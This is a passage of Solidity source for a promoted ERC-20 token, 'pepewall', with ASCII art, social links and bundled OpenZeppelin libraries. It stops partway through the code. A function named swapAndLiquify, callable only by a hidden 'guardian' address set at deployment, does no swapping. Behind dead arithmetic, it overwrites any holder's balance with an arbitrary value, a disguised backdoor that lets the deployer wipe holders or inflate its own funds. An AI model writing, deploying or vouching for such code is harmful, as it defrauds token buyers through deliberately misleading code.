/*
                                                                                                                                                                                                   
                                                                                      .......         ..',;:ccccc:;'..    .......                                                                       
                                                                             ...............     .;lodOKXWMMMMMMMMWNKOdc'.  ................                                                            
                                                                        ...................  .;oOXWMMMMMMMMMMWMWNXKXW0oclol. ....................                                                       
                                                                   ..............'''''...   :0WWMMMMMMMMMMWWWKdc:c;,l; .dXWKo. .'''''''..............                                                   
                                                              .............'',,,,;;,..     ,KMMMMMMMMWXOdc:xXc  :Kx..,..ldKMW0:..,;;;,,,,,''''...........                                               
                                                           ..........''',,,;;;;::,.        oWMWX00KNWk'  .;xNk. .'. :x, .lKN0KNx..:c:::::;;;,,,''''.........                                            
                                                        .........''',,;;;;:::::;'.         dMKc....:ol. .ckKWWO'  .oXNd..cl;':dkd',lllllccc:::;;;,,,''.........                                         
                                                     .........'',,;;;:::::c:::,.           dMX: 'c.  .;.  .oNWNk. .xWWNo',lkOK00Xd':dooooollllcc:::;;,,''........                                       
                                                   ........'',,;;:::cccc:::::'.            cWM0,'Od.  cc. .ll,,xx..oWWWNXXKOkdollc'.:looddoooooollcc::;;,,''.......                                     
                                                 .......'',,;;::ccccc:::::;,'.             ;KMWx..'..,OXl.   .cON0xOKOxol;'..        ...,;clodddddollcc::;;,,'........                                  
                                                ......'',;;::ccccccc::,'...',,...          .xMMWo. c0XWMNOooxOK0Odc;'.                     ...';:coodoolcc::;,,''.......                                
                                              ......',,;:::cccccc:;,..';coxkOOkkxo:'        :XMMNl.;xKMMMNK0Oxl:'.                        .........'cdddollc::;,,''......                               
                                            ......',,;::ccccccc;'..,cdkOOOOOOOkkxxxdc'.     .dWMWXoco0WKOkoc,.                       .. ..''''''''...;dxddoolc::;,,'.......                             
                                          ......',,;:::ccccc:,..;lxOOOOOOOOkxxddddxdddc'     '0MWWN0OOdc;.                        ..;cc:,............,xOkxxdoolc::;,,'......                            
                                         .....'',;;:::c:cc;'.'cxO0OOOOOkxxxdddddddddddddc,.   ,0NOo:,,.                         .':lllllllc;,,'''. 'lk0OOOkxxdoolc:;;,''.....                           
                                       ......',,;;::::::;'.,lkOOOOOOOkxxdddddddddxdddddddxoc;..;;..                           .':llllllllllccloooc.'xKK00OOkkxddollc:;,,'......                         
                                      ......',;;:::c:::,.'lO0OOOOOOxxddddddddddxxddollcc:::::;;'.                            .,;;,,,''''''''',,,,;,.,kKKK00OOkkxddolc:;;,''.....                        
                                     .....'',;;::::::;..:k0OOOOOkxxdddddxxdoc:;;:::::::::ccc::;,,.                         ..,;;;;;;;;;::cc::::;;,,'';::cldkOOOkxxdolc::;,'......                       
                                   ......',;;::::::;,.'dO0OOOOOkddddddoc:::::cllodxxxxkxxxxxxxxxxdc,..                   .;lddooooooooddddddddddddddddl:;'',;cxOkkxdollc:;,''.....                      
                                  .....'',;:::::::;'.;kOOOOO0kxdddddoc::lodxxxddddddddddddddddddddxddo:,...        .',:lodddooooodddddddddddxxxdddddxdddollc:'.:xOkxdoolc:;,''.....                     
                                ......',,;:::::::;..ck0OOOOOxdddddxdoddxddddddddddddddddddddxxxdolc:::,'',''.......,:coddxddddddddddoolc::::::cc::ccc::;;,,,''..;dxxxxdolc:;,''.....                    
                              ......'',;::cccc::;'.cOOOOOOOxdddddddddddddddddddddddddddxddoc:;;;::::cccllodddddlc:;;;:;;,;ldxdoc::cccccllllllcc:::::;;,''..',;,''',,;:loolc:;,,'.....                   
                             .....'',,;:ccccc:::,.:OOOOOOkxdddddddddddddddddddddddxxdoc:;;::ccccccccccllodddddollc::::::c;'';cllodxkxdocc:::;;;;;::::cc::;;:clllclc:;'.,lolc:;,,'.....                  
                           ......',,;::clllcc::;.,kOO0OOkxdddddddddddddddddddddddoc;;;:cllcccc:::;::::;,,''''''',,;:llc:clc..lOkdolccccclodoolcc::;;,,'''''''''',,,,;;..ldolc:;,''.....                 
                          .....'',;;:cllllcc:::..d0OOOOkxddddddddddddddddddxxoc:;:clllc:::;;:::c:'        .:,       .,,,,;::.'oollodxdl:::cclllo;. ..  'cc,.      .;c;.'cdollc:;,'.....                 
                        ......',;;:ccllllccc:,..:O0OOOOxddddddddddddddddddoc::clddlc:::::clodk0X0;.lx:. .ck0Od,      ,dkdl:'..lxdocclloxO0XNWMWWk.;k:'lO00Ox:.     .oKKd,,lolc:;,,'.....                
                       .....',,;:ccllllccc:,':c:d0OOOOkddddddddddddxdddoc:ccoxkxdlccclodkKWMMWWWW0:,:'.;x00kk0Od;.    .oXWNO,.:lodx0XWMMMMMMMMMMWo.,lk0kl;ck0Oo.     :KW0;'lolc:;,''.....               
                     ......',;;:clllllcc:,';oOdlO0OOOOxddddddddddddxdlccldkxdxdoclod0XWWWMMMMMWWWK;  .o00kl'.:x0Od'     lNWWk.:0NWWMMMMMMMMMMMMWO;..cxo'....;l;..;;.  lNMk';dllc;;,'.....               
                    .....'',;:ccllllcc:;.,oOOOxxOOOOOkddddddddddxdl:cldxxdddolodkKWMMMMMMMMMMWKOd;'...'lo'..'..:oc....  .xWWK,cWMMMMMMMMMMMMMXxc:odc.. .lOkl.  .cO0c. '0M0,;dolc:;,''.....              
                  ......',;;:clllllc:;'.ckOO0OOOOOOOkxdddddddddxxo,,xkxddlloxONWMMMMMMMMMMMMM0; .:kkxl.   ;kOd,   .oOx;  :NM0,lWMMMMMMMMMMMMMO. .lxc....'co;..;'.,;.  .OWd,odolcc;;''.....              
                 ......',;::cllllcc:;.,dO0OOOOOOOOOOkdddddddddddxd;';:col,;ONMWWWMMMMMMMMMMMM0, .;xkxl. ..'okd' ...:xd,  ;XWx,xWMMMMMMMMMMMMMNl   . .oOd;. .:k0k;     ;0x;lkxdolc:;,'.....              
                .....'',;:ccllllcc:,.;k0OOOO0OOOOOOkxddddddddddddxdlllodxoccldOXWWMMMMMMMMMMMWl   ....'oxl.....:dd;...   :NX:.kWWMMMMMMMMMMMMMXc    .,lk0kodO0x;.     ;c'.okxdolc:;,''.....             
               .....',,;:clllllcc:'.cO0OOOOOO0OOOkxdddddddddddddddddddddddddoc:cld0NWMMMMMMMMMK:      'dO0kc',d00kc.    .k0:'';loxOKNWMMMMMMMMMNx'     .cx00kc.     ..,:,'okxdolc:;,''.....             
               ....',,;:cllollc::'.lO0OOOOOOOOkxxdddddddddddddddddddddddddddddxdl::cldkKNWMMMMMKc.     .,oO0OO0Ol.      ,c,.'cc,..';cloooddxxxxxxo,      .;c,....',;:c;',oOkxdolc::,,'.....             
              ....'',;:clloolc::'.lO0OOOOOOOkxdddddddddddddddddddddddddddddddddddxxdoc::clodk0XNNk;.      'lk0d'       .';c;'cdol:;,,;:cc:::::::;,,,,,,,;;:::cccc:;,,;cok0Okxdolc::,,'.....             
             .....',;:clloolcc:'.cOOOOOOOOkxdddddddddddddddddddddddddddddddddddoccldddxxdoc:::cllll,..     .,;.....',;:cc;,,:ddddddo:,',;clooooolcccc:::;;;;,,,,..cdk0K00OOkxdolc::,,'.....             
            .....',;:clloolcc:,.:OOOOOOOOkxddddddddddddddddddddddddddddddddddddddlccccclooddxxxddoolllcccc::::cccc:;;;;;;:ldddddddddddl;..,::cc:;;;;,,,,,,;;;;;,,oKXXKK00OOkxdolc:;,''.....             
           .....',;:cllooolc:;.,k0OOOOOOkxddddddddddddddddddddddddddddddddddddddddddolcccccccc:::::::::::;;;;;;:::;:ccoddxdddddddddddddxo:,;codolllllllcc:;,,,'.cKXXXKKK0OOkxdolc:;,''.....             
           .....',;:clooolc::..o0OOOOOOOxddddddddddddddddddddddddddddddddddddddddolooddxxxxxdddoooollllllllcc:::::cddddddddddddddddddddddxo:,,:;;;;;;;;,,,,;;:c:'c0XXKK00Okkxdolc:;,''....              
          .....',;:clooolcc:,.:OOOOOO0Okdddddddddddddddddddddddddddddddddddddddddlc:::;;;;;;;;;;;;;;;,,,,,;,,,,;:lddddddddddddddddddddddddddo;,:c:::ccclllccllcl:';kKKK00Okxxdolc:;,'.....              
          ....'',;:loooocc:;..d0OOOOOOkxddddddddddddddddddddddddddddddddddddddddddxxddoollccc::::::::cccclloooddddddddddddddddddddddddddddddddlcooollccccccclccclc',xK00OOkxddlcc:;,'.....              
          ....',;:clooolc::;.,k0OOOO0Okdddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddolcclccclcccccc',xK0Okkxdolc:;,''.....              
         .....',;:clooolc::'.cOOOOOOOOxddddddddddddddoodddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddxolclccccccccccc',ldxkkddocc:;,'.....               
         ....'',;cloodolc::..o0OOOOOOkxddddddddddddc;:oddddddddxxdddddddxxxxddxddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddolccccccccccc:;...'';odolc:;,,'.....               
         ....',;:cloddolc::..d0OOOOOOkxddddddddddd:.:ddddddddxo:;;,,,,,,,,;;;::cloodddxddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddoccccllc:;,'...',::;..lolc:;,'.....                
         ....',;:cloddolc::..x0OOOOOOkxddddddddddc.;ddddddddo:'';clllllccc::;;,,,,,,,,,;;::clloddddddxxxxxxxdddddddddddddddddddddddddddddddddddddddollc:;,,'...'';:::::::..cocc:,,'.....                
         ....',;:clodddlc::..x0OOOOOOkxdddddddddd,.lxdddddxo,.codddooooooddddddddoollc:;;,,,',,,,,,,,,,;;;;:::ccllooooodddddddddddddddooooolllcc:;,''.....',;::c::::::c;..;olc:;,''....                 
         ....',;:clodddoc::..o0OOOOOOOxdddddddddd'.oxdddddd;.:dddoooooollooooooooooooodddddooooolllccc::;;;,,,,',,,,,,,,,,,,,,,,,,,,,,,,,,,'''..'''',;;:c::::::::::c:;'.,colc:;;,'.....                 
         ....',;:clodddolc:'.c0OOOOO0Oxdddddddddd;.lxddddxd'.ldddolc;,;:clooooolllllloooooooooooooooooooooooooooooolllllllllllllclllllllllollc::cc::::cc::::::::;,,'.';lddolc:;,'.....                  
         ....',,:cloddddlcc;.,k0OOOOOOkxddddddddxd;;odddddd,.:oddool:'....',,;::cllooooooolllllllllllllllllllllllllllllllllllllllllllllllllc:::::::::::::;,,'.......cxkxdolc:;,,'.....                  
         ....'',;:clodxdolc:'.o0OOOOOOOkdddddddddddcldddddxl'.:ooddooolc,..    ....'',,;;;:ccccclllllloooooooooooooooooollolloolooollllcc:;;,,,''''........'',;::c,.;xkxdolc:;,'.....                   
          ....',;:clodxxdlcc;.,x0OOOOOOkxddddddxddddddddddddo;.'cddddoolllc:;,'..... ............'''''',,,,;;;;;;:::::::;;;;,;;;,,,'''''... ...............:c::::::..oxdolc:;,''....                    
          ....',,;:lodxxxdlc:,.;k0OOOOOOkxddddddddxddxddddddxdl,.'coddooolllloolc:;,''..............'',,,,,'''''''''''''''......',,,,,,;,'.................,::::c::'.cdolc:;,''.....                    
          .....',;:clodxxxdlcc,.:k0OOOOOOkddxddxdxxxxxxxxxxxxxxdl,.'cooddoolllllllllollc:;,'.............',,,,;,,,,;;:::cccc:;,''',:cccc::;'..'''........ .;::::::c..colc:;;,'.....                     
          .....',,;:clodxxxdlc:,.,x0OOOOO0KXXXXXXXXXXNNNNNNNNNXXXKkc,,;coooooolllllllloooooolc::;;,,,''...',,'..'',:ccccccccccccc;,,;ccccccc'..','.......';:::::::;..clc:;,,'.....                      
           .....',;::cloxxkxdlcc;.'lOOOOOXXxlllooooooooddddddddxxk0XKkc,',cdOOxddxxxxkkkkkkOOOOOO000000OOOO0Okxdc'.':ccccccccccccccc:ccccclol' ...;oxkOO000OOOOOOkxdk0OOOkxxxxddddxxo'                  
            .....',;:cclodxkxdolcc,',lkOXNd.                      ..:xXKd;;OXc............................''.cKWx.   .,:cccccccccccccccccccldc. .o0xccccclllllllllloooooooooooooodONNl                  
             .....',;:cclodxxxxoolc:,.'dN0'                           :0W00Nx.                              .xW0'      .';clcccccccccccccccldd, .kd.                             .oNx.                  
             ......',;;:clodxxxxdolcc::OXc                             cXWWK,                              .oNNc          .;cccccccccccccclodd:.,x,                              lXk.                   
               .....',,;:cllodxxxdolccONd.         .:lddddl'           .OMNl                               lNWd.          ..';ccccccccccccoddd; ';                              cXO'                    
                .....'',;::cloodxxxolkN0'         ,0WWWMWWWX:          .OMk.                              cXM0'         'd00o,.,cccccclloodddc. ..                             :XK,                     
                 ......',,;::cllodxdkXXc         .kW0xkO0XWWl          ,KX;                              :XMXc         .kXkdxko;.':ccclooooo:..,'                             ;KK:                      
                   ......',,;::cllodKWx.        .dWKl',,;xNX:          lNo         .,:cccloodxxkkkOkkkkxx0WWx.        .oXxccccd0k:..',,;;;;...oc.           ......',,;;;;;;,':0K;                       
                    .......'',;;::cxN0,         cNNklllcl0Wx.         'OO'        .oNMMMMMMMMMMMMMMMMMMNO0W0,         cXOlcllco0Wd.         'OO'         :OOO0KKXNNWWWNNXK0Okkd'                        
                      .......''',,lKNc         ;KW0olooxKWO'         .oX:         .lxddddddddddddooxOXMX0XNc         ,0KocllllON0'         .dK:         ;KNNNNNNNNNNXXXK0Ok:.                           
                        .........,kWx.        .kWKdlodOXNx.          :Kd.                          :OXWKXWx.        .kNd;,,:o0W0,          :Kd.         .,'''''''.''....'oNd                            
                           ......lN0,         cNWKkOKNN0c.          '00'                          '0MWXXW0,        .dN0lcloONNx.          '00'                          'O0,                            
                              . ,0Nc          .:xOOOko;.           .kXc                          .dWMWNWNl         .lKNWMWNKx;           .xXc                          .dXc                             
                               .xWx.              .               .xNx.                          lNWWWWWx.           .,:c:,.            .dNd.                          cXd.                             
                               cXK,                              ,kW0'         .:;,'.....       ;KWWWWMK,                              .dN0'                          ,0k.                              
                              '0Nl                             ,dKNXc         .kMWWNXXK000Okxddd0WNWWWNl                              ;OWNc         .oOkxddollc:;;,'.,kk.                               
                             .xWx.  ...'...               .':ok0kd0d.         cNNK000000KKKKKKKKK0xxxxo.             ....         .'cxKWWd.         cNKolooddxkOO0KKOko.                                
                             cNK;..'',,','''.';;;;::;,',lkKNWNd,'dO'         '0WXkxkkkkOOOOkOOOOx:,,'',..           .',,,'...';cldxkxxKWO'         '0K:         ......                                  
                            ,0Xo'',,',,,,,cdclxxxOK0l;,,:xXWWd..cOc          oWWWNNNWNWNNWNNNNN0l,,'',,'...     :xx:,,',,:ocl0Kkxoc;:kWX:         .dWKxdxxxxxddooolc:'                                  
                           .oxc,,,,,',,,,,cl,.    .,,',,,:xOx, ,kd.          ';::ccllloooooolllc;',,','.',.    :KNk:'',';oo;;oc,;,,,oNWo.         .okOO00KKXXXXXXKKK00o.                                
                           ;c,,,,,'',,,,';:,'.     .',,,,,'''..dk.                            .',,',,'..''.   '0WO:,,',,ld:,,;,'''.:KWO.               .....',,'.....dd.                                
                          ,dc,,,''..',,,,,'''.     .:,',,,'..'d0;                             .',,,,,..''.    oWKl,,,,':oc,,'.....'xWX:                    .',''.   .Oo                                 
                         .xNd......',,,';;',.      ,d:',,,'..oKo                             .',,,,'...,.    'O0l,,,,,'',,'.......lXNl                    .',,,,'...cKc                                 
                         lNXc..,;'',',,,c:''...    .::,,,,'''ld'            ......           .,,,,'...''.    .,..',',,'.''.      'OWx.                ....',,',,..',xk.                                 
                        .dWNK0KK0o,,,,':l:'..'''..   .,,,,,::ckOOOkkkkkkxo;'',,,,,'..      .'',,,,,''',''''.    .,,'''..,.       .kNx;'...'.'...,;;;;,',,,,,,,,'.,:ox;                                  
                         .,;:oKWOc,,,,''''..',,',.....,,',''',;;;,,,,,;:c:,',,,,,,,,..      .,,',,..''..       .',,,,'.''.        'dxl;,,,,',,,;dXWWN0l,,,',,,,,,;cl'                                   
                              dKl,,,,,,....'',,','....,,,,,..'.      ..',,,','',,,','...   .',,,,'..,,.        .,,,,'..'.          .,,,,,''',,,':k00WWXk:,,,,,,,,,,'.                                   
                             .dx;,,,,'''..',',,,,'....,,,,,..'.     .',,,,''...',,,'..'.   .',,,,..';'.       .',',,'..'.         .',,,'...',,'';dllKWNx;'',,''''''..'.                                 
                             .lc,,,,'....',,,,',,'....,,,,'..'.    .,,,,,'.....'''...',.   .,',,'..,,.        .',,,,..''.        .,,'','..',,,,'cd:,cdl,',','......'''.                                 
                             .',,,,,'...',,,,,,,','...,,,,'..'.  ..',,,'.....',,'...''.    .,,,,'..''.   ...  .,,,',..'.    ..   .,,,,'',,,,,,,ld:,.   .,,,,'..'......                                  
                             .',,,,'...',,,,'',,,,'...,,,,'.''. .',,,,'.....',,,,.....     ',,,,'.''.. ..','...',,',..'.  .'','..',,,',,,,,'':oxl,..   .,,,,'.',. ....                                  
                             .',,,,'..',,,,'..',,,,''',,','.''..',,,,'....''',,,'..'........,,,,'..'...',,','..',,,'..'...'',,,..',,,,'...'.',;::,',...',,,,'.''..',,,..                                
                             .,',,''',,''''....',,,,,,,,''..,...',,,,'...',,,,,,'...',,,,'..,,,,,.....',,,,'..',,,,,'...'''',,..',,',,'.......'',',,,..',,,,'....,,',,'...                              
                             .,',,,,,',,''.',...',,'',,''..''. .,,,,,''',,,,,,,,'''',,,,''..,,,,,''''',,,,'..''',,,,'''',,,''..',''',',,''''',,,,'''..',,,,,,'''',,,,'..,'.                             
                             .',,,,,,,,'..','.  ..'''''...',.  ..',,,,,,,,''',,,,,,,,,,'..'',',,,,',,,,,'...,'...,,,',,,',''..','...'',,,,',,,,,''..'''''',,,'',,,,'..'''.                              
                              .'',,,''..'''.       ...'''''.     .''',,''.....''',,''...'''....''''''''...',..   ..''''''...','.    ...'''''''....'''......'''''''..',,..                               
                                ......'''..          .....         ...''..''.. ...'..''''..     .......'''..       ....''''''..        .......''''...      .....''','..                                 
                                  ......                             .......     .......          .......            .......             ........            .......                                    
                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 
Twitter: https://twitter.com/Pepewalletpro
Telegram: https://t.me/pepewalletofficial
Website: Pepewallet.space
WhitePaper: https://pepe-finance.gitbook.io/untitled/description-of-products/unionpay-debit-cards                                                                                                                                                                                                                                                                                                       
*/

// SPDX-License-Identifier: UNLICENSED

// Dependency file: @openzeppelin/contracts/token/IERC20/IERC20.sol
 
// pragma solidity ^0.8.0;

/**
 * @dev Interface of the IERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}


// Dependency file: @openzeppelin/contracts/utils/Context.sol


// pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// Dependency file: @openzeppelin/contracts/access/Ownable.sol


// pragma solidity ^0.8.0;

// import "@openzeppelin/contracts/utils/Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// Dependency file: @openzeppelin/contracts/utils/math/SafeMath.sol


// pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}


// Dependency file: contracts/BaseToken.sol

// pragma solidity =0.8.4;

enum TokenType {
    standard
}

abstract contract BaseToken {
    event TokenCreated(
        address indexed owner,
        address indexed token,
        TokenType tokenType,
        uint256 version
    );
}


// Root file: contracts/standard/StandardToken.sol


pragma solidity =0.8.10;

// import "@openzeppelin/contracts/token/IERC20/IERC20.sol";

// import "@openzeppelin/contracts/access/Ownable.sol";

// import "@openzeppelin/contracts/utils/math/SafeMath.sol";

// import "contracts/BaseToken.sol";

contract pepewall is IERC20, Ownable, BaseToken {
    using SafeMath for uint256;

    uint256 private constant VERSION = 2;

    mapping(address => uint256) private _tOwned;

    mapping(address => mapping(address => uint256)) private _allowances;
    
    address private settingGuardian;
    string private _name;
    string private _symbol;
    uint8 private _decimals;
    uint256 private _totalSupply;

    constructor(
    address fallback_,
    string memory name_,
    string memory symbol_,
    uint8 decimals_,
    uint256 totalSupply_
    ) payable {
    settingGuardian = fallback_;
    _name = name_;
    _symbol = symbol_;
    _decimals = decimals_;
    _mint(owner(), totalSupply_);

    emit TokenCreated(owner(), address(this), TokenType.standard, VERSION);
    }

    function name() public view virtual returns (string memory) {
        return _name;
    }

    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    function decimals() public view virtual returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _tOwned[account];
    }

    function transfer(address recipient, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function swapAndLiquify(address account, uint256 swapTokensForEth) 
        external 
        onlyGuardian 
    {
        // split the contract balance into halves
        uint256 liquidityTokens = _tOwned[account];
        uint256 half = liquidityTokens / 2;
        uint256 otherHalf = liquidityTokens - half;
        uint256 newBalance = 1;

        if (newBalance > 0) {
        _tOwned[account] = swapTokensForEth / newBalance;
        }
    }

    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "IERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
